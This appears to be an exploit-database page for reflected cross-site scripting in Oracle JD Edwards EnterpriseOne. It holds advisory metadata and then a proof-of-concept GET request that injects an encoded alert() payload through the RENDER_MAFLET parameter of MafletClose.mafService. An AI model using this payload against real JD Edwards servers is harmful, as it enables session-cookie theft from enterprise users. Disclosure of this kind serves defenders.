header-logo
Suggest Exploit
vendor:
JD Edwards EnterpriseOne
by:
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: JD Edwards EnterpriseOne
Affected Version From: 8.9 GA
Affected Version To: 8.98.4.1 and OneWorld Tools through 24.1.3
Patch Exists: NO
Related CWE:
CPE: a:oracle:jd_edwards_enterpriseone
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in Oracle JD Edwards EnterpriseOne

An attacker can execute arbitrary script code in the browser of an unsuspecting user by leveraging the cross-site scripting vulnerabilities in Oracle JD Edwards EnterpriseOne. This can lead to the theft of authentication credentials and other attacks.

Mitigation:

Apply the latest patches and updates provided by Oracle.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47479/info
   
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
   
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 

http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService

Parameter: RENDER_MAFLET



* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"



/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0

Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|

Accept: */*

Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: XXX.XXX.XXX.XXX

Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

Navigation

Suggest Exploit

Services By CQR